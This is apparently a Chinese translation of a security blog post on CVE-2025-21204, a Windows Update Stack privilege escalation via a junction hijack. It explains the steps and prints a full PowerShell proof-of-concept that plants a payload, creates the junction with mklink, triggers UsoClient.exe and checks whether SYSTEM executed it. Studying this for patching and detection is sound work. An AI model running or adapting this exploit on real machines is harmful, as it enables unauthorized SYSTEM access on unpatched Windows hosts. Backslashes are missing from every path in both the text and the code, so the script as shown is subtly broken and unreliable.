【翻译】CVE-2025-21204 Windows Update Stack의 Improper Link Following Privilege Escalation
URL
https://cyberdom.blog/abusing-the-windows-update-stack-to-gain-system-access-cve-2025-21204/[1]
目标
-
使用 2025 年 4 月更新之前的 Update Stack 的 Windows 系统 -
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21204/[2]
说明
CVE-2025-21204 是 Windows 更新栈中的本地权限提升漏洞,发生在MoUsoCoreWorker.exe和UsoClient.exe等具有 SYSTEM 权限的进程执行更新过程中。在更新过程中,具有 SYSTEM 权限的进程会执行位于C:ProgramDataMicrosoftUpdateStackTasks路径下的脚本或二进制文件,但该文件夹的权限设置不当,攻击者可以删除该文件夹并用指向包含恶意负载的文件夹的链接(junction)替换它,从而通过以下步骤实现权限提升:
-
攻击者在其可控制的路径中放置 PowerShell 脚本等负载。 -
删除 C:ProgramDataMicrosoftUpdateStackTasks并用链接到步骤 1 中创建负载的路径的 junction 替换它。 -
通过计划任务或直接触发更新来创建 UsoClient.exe、MoUsoCoreWorker.exe、TiWorker.exe等进程。 -
创建的进程执行负载,从而实现权限提升。
以下是用 PowerShell 编写的 PoC[3],通过创建系统权限文件来证明权限提升的成功。
<#.SYNOPSISCVE-2025-21204 exploit simulation for non-admin users via junction-based path hijack..DESCRIPTIONDrops a bait payload in a user-controlled directory, creates a junction to hijack the Update Stack path,and triggers the update process to test if SYSTEM accesses the payload.The script provide the poc that allows to run this actions..AUTHORElli Shlomo#># Paths$trapPath = "$env:APPDATAMicrosoftUpdateStackTasks"$updateStackRealPath = "C:ProgramDataMicrosoftUpdateStackTasks"$payloadPath = "$trapPathUpdateStackAgent.dll"$proofPath = "C:UsersPubliccve2025-proof.log"$logPath = "$env:APPDATACVE2025simulation.log"$evidencePath = "$env:APPDATACVE2025evidence.txt"$verdictPath = "$env:APPDATACVE2025vulnerable.txt"$verboseLog = "$env:TEMPcve2025-verbose.log"# IntroWrite-Host "`n[*] CVE-2025-21204 Exploit Simulation (Non-Admin)"Write-Host "[*] Trap directory : $trapPath"Write-Host "[*] Payload DLL path : $payloadPath"Write-Host "[*] SYSTEM proof file : $proofPath"Write-Host "[*] Simulation log : $logPath"Write-Host "[*] Evidence file : $evidencePath"Write-Host "[*] Verdict result : $verdictPath"Write-Host "[*] Verbose transcript : $verboseLog`n"# Start transcriptStart-Transcript -Path $verboseLog -Force# Ensure directories existWrite-Host "[*] Creating necessary directories..."New-Item -Path $trapPath -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-NullNew-Item -Path (Split-Path $logPath) -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-NullWrite-Host "[+] Directories ready.`n"# Payload content$payload = @"Payload executed by SYSTEM at: $(Get-Date)"@# Write bait payloadWrite-Host "[*] Writing payload to: $payloadPath"$payload | Out-File -FilePath $payloadPath -Encoding ASCII$payload | Out-File -FilePath $proofPath -AppendWrite-Host "[+] Payload written.`n"# Simulation metadata log$log = @"CVE-2025-21204 Exploit Simulation-------------------------------------Date : $(Get-Date)Payload File : $payloadPathHijack Path : $updateStackRealPathProof File : $proofPath"@Set-Content -Path $logPath -Value $log -Encoding UTF8 -ForceWrite-Host "[+] Simulation metadata saved.`n"# Attempt junction creation (non-admin safe)Write-Host "[*] Attempting junction (no admin)..."if (-not (Test-Path $updateStackRealPath)) {try {$cmd = "cmd.exe /c mklink /J `"$updateStackRealPath`" `"$trapPath`""Start-Process -FilePath "cmd.exe" -ArgumentList "/c mklink /J `"$updateStackRealPath`" `"$trapPath`"" -NoNewWindow -WaitWrite-Host "[+] Junction created: $updateStackRealPath → $trapPath"} catch {Write-Host "[-] Failed to create junction: $_"}} else {Write-Host "[!] Target path already exists: $updateStackRealPath"Write-Host "[-] Cannot create junction unless folder is removed by SYSTEM update cleanup."}Write-Host ""# Trigger updateWrite-Host "[*] Triggering UsoClient.exe (StartScan)..."try {Start-Process UsoClient.exe -ArgumentList StartScan -WindowStyle HiddenWrite-Host "[+] UsoClient.exe started.`n"} catch {Write-Host "[-] Failed to trigger UsoClient.exe: $_"}# Monitor for SYSTEM processWrite-Host "[*] Monitoring for SYSTEM process MoUsoCoreWorker.exe..."$found = $falsefor ($i = 1; $i -le 6; $i++) {Start-Sleep -Seconds 5Write-Host "[=] Attempt ${i}: Checking..."if (Get-Process -Name "MoUsoCoreWorker" -ErrorAction SilentlyContinue) {Write-Host "[!] SYSTEM process detected: MoUsoCoreWorker.exe"$found = $truebreak}}Start-Sleep -Seconds 5# Check for successWrite-Host "`n[*] Analyzing payload execution..."if (Test-Path $proofPath) {$owner = (Get-Acl $proofPath).Owner$timestamp = (Get-Item $proofPath).LastWriteTime$details = @"[+] Exploit successfulPayload executed as: $ownerLast Modified: $timestamp"@Set-Content -Path $verdictPath -Value $trueWrite-Host "[✓] SUCCESS: SYSTEM likely accessed the payload."} else {$details = @"[!] Exploit failedNo proof file found.Time: $(Get-Date)"@Set-Content -Path $verdictPath -Value $falseWrite-Host "[✗] FAILURE: Payload was not executed by SYSTEM."}# Save evidenceSet-Content -Path $evidencePath -Value $details -Encoding UTF8Write-Host "[*] Forensic evidence saved: $evidencePath"# EndStop-TranscriptWrite-Host "`n[✓] Simulation complete. See verbose log: $verboseLog`n"
在 2025 年 4 月的补丁更新中,作为缓解措施,Microsoft 预先创建了可能被用于攻击的文件夹(如 C:inetpub等),并应用了默认 ACL,从而防止这些文件夹被用于链接跟随(link following)攻击。
参考资料
https://cyberdom.blog/abusing-the-windows-update-stack-to-gain-system-access-cve-2025-21204/: https://cyberdom.blog/abusing-the-windows-update-stack-to-gain-system-access-cve-2025-21204/
[2]https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21204/: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-21204/
[3]PoC: https://raw.githubusercontent.com/eshlomo1/CloudSec/refs/heads/main/Attacking%20the%20Cloud/CVE-2025-21204/Exploit-CVE2025-UpdateStackLPE-NonAdmin.ps1
原文始发于微信公众号(securitainment):CVE-2025-21204: Windows Update Stack 中的不当链接跟随导致的权限提升
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论